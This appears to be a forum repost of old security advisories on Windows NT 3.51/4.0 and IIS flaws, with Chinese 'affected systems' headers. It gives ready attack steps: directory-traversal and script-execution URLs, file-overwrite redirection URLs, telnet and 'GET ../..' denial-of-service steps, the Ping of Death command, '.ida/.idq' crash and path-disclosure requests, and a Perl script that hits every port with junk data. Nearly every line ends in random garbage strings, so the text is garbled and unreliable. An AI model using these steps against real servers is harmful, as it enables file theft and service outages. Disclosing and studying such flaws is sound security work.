受影响系统:4.0,iis 1.01 F/ y9 X# T5 G) _2 p. w* n4 t
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
7 H, N$ N" E8 L Q' z7 z: I! K9 N& P+ r
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
* x/ ~2 A3 u/ i! B4 L; e! `; E/ q' U5 H; d% d( G) H
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.6 k, y8 q5 z- Q3 e, b4 l8 O
; x" r v- F" W. t3 `8 e! K- z--------------------------------------------------------------------
- K8 C- ]# O8 _% z0 \% R0 I2 B6 k U
0 a+ \' z# p, \* I4 ]# H0 G7 t受影响系统:4.0
l8 ~- R4 G- @+ {A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.5 t. J, \+ S5 u: U% C
# T0 T' M' f0 S% L+ L) U! g% r
If the file 'target.bat' exists, the file will be truncated./ Z) ^& Z6 y& b, N: J
; {8 M1 s8 n7 b9 t g! T4 x
; F; W; d# l3 t2 u- D
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''., R! p7 k% X: A7 Q
# s9 {2 W# o5 k: {1 r
----------------------------------------------------------------------
# a% c5 h5 |- b' [8 ^
3 E4 d/ @) U; O受影响系统:3.51,4.0) z0 m) H6 ~1 |( V
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.; ]4 m( a7 J. p/ R' P' l# b) l5 N
& N5 _) H. Y6 z3 v! R0 q/ n& YThe following steps;, e+ [! @" F# a! m2 G& V, {" j
m1 y* m. V/ S5 P, C+ gTelnet to an NT 4.0 system on port 135
Y8 _3 O1 C2 x! u- E% o) dType about 10 characters followed by a <CR> 2 d( V! A; N3 h, ]4 S
Exit Telnet
9 H" w5 V5 s8 ^results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
% M) H4 E2 u! [3 T! a3 C h: g; P4 c' o
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.( E1 [1 P7 d8 d; T
* v# V0 _" i# c1 lThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.6 ^' b f* N1 O# R8 @: J
3 i1 o7 r7 O3 l) s/ i$ V \8 L, H1 y
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.5 J) [0 n( E" g) a( j
+ g O- w d5 M2 o. C0 A( n* L; A, `: {
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):% X6 e- F, X% x8 H- E0 ^
0 t7 W C% _! W3 y4 e/*begin poke code*/
# P3 D) s( N+ s7 C/ ]3 X/ ]' m: S; h$ R! F5 n& L; S
use Socket;
" }7 X. w( P! A& W! O8 quse FileHandle;
4 g2 Q; e+ b7 d( N8 o( [) x! W9 hrequire "chat2.pl";6 q0 T: n, Z9 o% K9 b* k0 ]8 i% j
& |$ C( G# i# I5 E6 d
$systemname = $ARGV[0] && shift;
* k/ |5 Y! ?; Y) e2 i6 Z( Q) _2 q+ ], l
$verbose = 1; # tell me what you're hitting
! [! C D) k* ^( F8 v! P0 F7 Z$knownports = 1; # don't hit known problem ports
2 k0 j1 g) S2 `# gfor ($port = $0; $port<65535; $port++)
" Q2 s* ]0 e9 _/ C3 L9 A) |$ r{
: d0 N) ~5 ~- z2 a! J6 |* ]( d" ~9 |" w
3 K! L) e! [8 D5 x9 pif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
3 e% t7 V Q* pnext;
1 S- _8 W, Q# U5 y}
) k! q* m( Z! Q8 P( G$fh = chat::open_port($systemname, $port);
* b8 \1 F3 T: D( a1 W6 Rchat::print ($fh,"This is about ten characters or more");! x' R- {) o! L; S! a
if ($verbose) {
a3 ]0 A0 n) p% c1 }print "Trying port: $port\n";
- s# q- r5 s5 V6 [}
6 _, v- d2 m2 O4 ?+ Schat::close($fh);
8 l! f4 M9 l" _: [ b0 V) y$ W3 j6 J3 y
}
# d+ u! f' a. z/ m* U
: }0 u. c! k8 q7 @
4 j1 X1 q' G& U* Z* r4 j- o/*end poke code*// D3 S/ H' e( q: u9 P& L9 r
6 O% M# l$ w$ q5 A: a8 n7 y. G
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername$ r0 F5 W5 o0 z0 ~. C, \6 b. V
3 D/ O: `" A( ~; O--------------------------------------------------------------------------------& `' ]! r8 K2 |; c; J
/ X1 N4 x5 ~/ F6 ^- Y8 U, u" g2 V
受影响系统:4.0
) d4 o% L7 G9 s S2 eUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.% n7 A0 D6 H8 d' g( t( |
8 h9 X/ |, R+ U3 y2 B& @0 S% L$ DThis attack causes Dr. Watson to display an alert window and to log an error:
) M+ y& S9 K; s: D# ?, O
$ h# w' E) ]1 D8 e- r"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT": G3 D. }+ A) e6 L( e. x
' T* F* D5 y& }: y& N$ n--------------------------------------------------------------------------------* t5 ^( k2 q3 }5 K
+ R6 a9 W0 N: s m6 S o
受影响系统:3.51,4.0
% I$ K3 A; A+ f$ k1 Y' _) ULarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
- }2 y+ \4 h! j4 u8 F, n) v
1 E0 ~% H+ g- J7 s" c% ~9 ]0 OSTOP: 0X0000001E' x2 |+ l R* @: ~- \. Q
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS8 o1 Q6 A `; j0 w9 Y1 @
( r0 H* o# }4 t) N; n; A
-OR-2 f4 s3 b! a, y6 f
( L/ M( Y! J+ s# I" T$ fSTOP: 0x0000000A
! C$ _' q4 n3 }: ^- j5 S# T6 h2 P" sIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
7 s9 a0 c& G W% [1 ?; |
; g6 X; S- J; |NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
8 T/ I# q1 b2 r7 q$ m! |' J- @5 A: M1 P* d6 l
--------------------------------------------------------------------------------4 e+ o9 w* a* V# Y( o
* w( f8 I, Q& {5 ` sMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
3 E/ D1 j+ d+ W/ H& K# Y$ |6 a! b+ E& o: k
--------------------------------------------------------9 k8 G2 ? X; g( P
2 b3 l6 ^' M5 @, U5 q7 a
IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |